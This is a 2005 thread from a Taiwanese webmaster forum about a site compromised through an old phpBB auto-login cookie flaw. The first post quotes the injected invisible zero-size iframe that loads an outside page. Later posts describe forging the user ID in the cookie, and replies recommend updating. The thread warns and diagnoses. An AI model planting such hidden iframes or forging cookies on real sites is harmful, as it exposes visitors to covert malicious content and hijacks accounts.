網域名稱俱樂部


返回   網域名稱俱樂部 > 其他 > 影音及閑聊測試區

回覆
 
主題工具
  #1  
舊 2005-04-05, 05:05 PM
回憶過去 的頭像
回憶過去 回憶過去 目前離線
進階會員
 
註冊日期: 2003-02-07
住址: 公園
文章: 198
預設 [提醒]OLG.COM.TW有被放毒

<iframe src="http://www.yamsgame.com/help/help.htm" width="0" height="0" frameborder="0"></iframe>
請大大注意了
回覆時引用此篇文章
  #2  
舊 2005-04-05, 07:37 PM
game.tw game.tw 目前離線
進階會員
 
註冊日期: 2002-10-01
文章: 1,370
預設

這個問題在最近一直發生.......
之前是Link到一個 999sj.com 的網址...
今天開始才換了連結....

這位朋友的作法是在我的MySQL資料庫欄位中,插了一串 iframe...
其實他的作法並不高招,但無奈於功力不足....無法阻擋!

目前針對這個部份,我只開了
80Port 及 DNS , SMTP ,POP3 這四個port而已....
應該是由 80Port進來了.....
真再無法克服他.....
就只好在Lan裡面架一台SQL Server....僅在內部存取了..

唉........
每天都來.........煩死了...
或者有朋友有更好的解決方法?
__________________
Gamer.info
回覆時引用此篇文章
  #3  
舊 2005-04-05, 07:43 PM
some some 目前離線
進階會員
 
註冊日期: 2003-09-23
住址: 屏東
文章: 3,612
預設

這是 phpbb 的老 bug. 解決辦法就是更新.
__________________
nice to meet you                   flickr
回覆時引用此篇文章
  #4  
舊 2005-04-06, 09:29 PM
game.tw game.tw 目前離線
進階會員
 
註冊日期: 2002-10-01
文章: 1,370
預設

請問,若駭客在phpBB以webmaster(我的身份)發言...
是否表示phpBB也被攻陷了?
__________________
Gamer.info
回覆時引用此篇文章
  #5  
舊 2005-04-06, 09:47 PM
dx2 dx2 目前離線
進階會員
 
註冊日期: 2003-12-02
文章: 1,590
發送 MSN 消息給 dx2 發送 Yahoo! 消息給 dx2
預設

能夠以你的身分發言,趕快update並且跟換password
還要清查是否有可疑的user資料
回覆時引用此篇文章
  #6  
舊 2005-04-06, 10:09 PM
game.tw game.tw 目前離線
進階會員
 
註冊日期: 2002-10-01
文章: 1,370
預設

引用:
作者: dx2
能夠以你的身分發言,趕快update並且跟換password
還要清查是否有可疑的user資料
我已經確定了入侵者的IP位置.......
剛打了電話問Hinet,該公司的IP入侵其他用戶的IP要怎麼處理...

客服人員要我找電腦公司處理.......
唉..............................................
__________________
Gamer.info
回覆時引用此篇文章
  #7  
舊 2005-04-06, 10:21 PM
steven steven 目前離線
進階會員
 
註冊日期: 2003-05-27
文章: 1,404
預設

好個黑net
這是刑事犯罪了吧?
__________________
五分埔 | 德國 | 歐洲 | 美食 | 香水
Wufenpu | COVID-19 | Epidemic | Pandemic
回覆時引用此篇文章
  #8  
舊 2005-04-06, 10:45 PM
some some 目前離線
進階會員
 
註冊日期: 2003-09-23
住址: 屏東
文章: 3,612
預設

引用:
作者: game.tw
請問,若駭客在phpBB以webmaster(我的身份)發言...
是否表示phpBB也被攻陷了?
game.tw 大哥

這個版本2.0.11 之前有一個漏洞

有 hacker 用 C 寫了一個針對 phpbb 修改cookie 的程式
程式碼還在網路可以抓的到, 任何人都可以編譯來用.

所以你換密碼也是沒用的

攻擊方式是修改自動登入的 cookie 裡的 user ID

http://www.nsfocus.net/index.php?act...4&keyword=

所以最根本的辦法才是更新吧.
__________________
nice to meet you                   flickr
回覆時引用此篇文章
  #9  
舊 2005-04-06, 11:14 PM
game.tw game.tw 目前離線
進階會員
 
註冊日期: 2002-10-01
文章: 1,370
預設

感謝回覆!
目前所知....
IP來自兩個地方...
一個是Hinet
一個是對岸同胞
其目地只是為了建一個連結,將頁碼帶入....
我想"正式"來面對這個問題...

唉...............
網路這東西,對某些人還真是"超高科技"~
刑事局 已正推將此案 推到 偵九隊 ...
請明日再報案,希望不會再推到萬丈深淵了...
__________________
Gamer.info
回覆時引用此篇文章
  #10  
舊 2005-04-07, 12:48 AM
game.tw game.tw 目前離線
進階會員
 
註冊日期: 2002-10-01
文章: 1,370
預設

引用:
作者: some
攻擊方式是修改自動登入的 cookie 裡的 user ID

所以最根本的辦法才是更新吧.
所以基本上,這個駭客並非取得我Webmaster的密碼登入
而是透過cookie的漏洞進來的,對嗎?

感謝指教!
__________________
Gamer.info
回覆時引用此篇文章
回覆

主題工具

發文規則
不可以發表新主題
不可以發表回覆
不可以上傳附件
不可以編輯自己的文章

啟用 BB 代碼
論壇啟用 表情符號
論壇啟用 [IMG] 代碼
論壇禁用 HTML 代碼



所有時間均為 +8。現在的時間是 10:49 PM


本站主機由網易虛擬主機代管
Powered by vBulletin® 版本 3.8.4
版權所有 ©2000 - 2024,Jelsoft Enterprises Ltd.